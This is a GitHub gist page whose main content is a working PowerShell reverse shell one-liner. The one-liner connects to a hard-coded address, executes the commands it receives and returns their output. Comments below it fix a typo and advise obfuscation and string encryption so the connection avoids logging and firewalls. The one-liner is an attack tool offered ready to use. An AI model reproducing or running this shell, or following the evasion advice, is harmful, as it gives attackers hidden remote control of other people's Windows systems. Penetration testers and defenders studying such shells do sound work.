Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@ThunderSon

This comment has been minimized.

Copy link

ThunderSon commented Jul 9, 2018

Hello. Kindly check my fork to the project. The IP field has a typo.

@egre55

This comment has been minimized.

Copy link
Owner Author

egre55 commented Jul 9, 2018

hey, thanks for the heads up!

@chnz2k

This comment has been minimized.

Copy link

chnz2k commented Apr 15, 2019

Using sockets without obfuscation or string encryption is a high risk, windows can log data connexion to the c&c server and some firewalls such as zone alarm block the packets.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.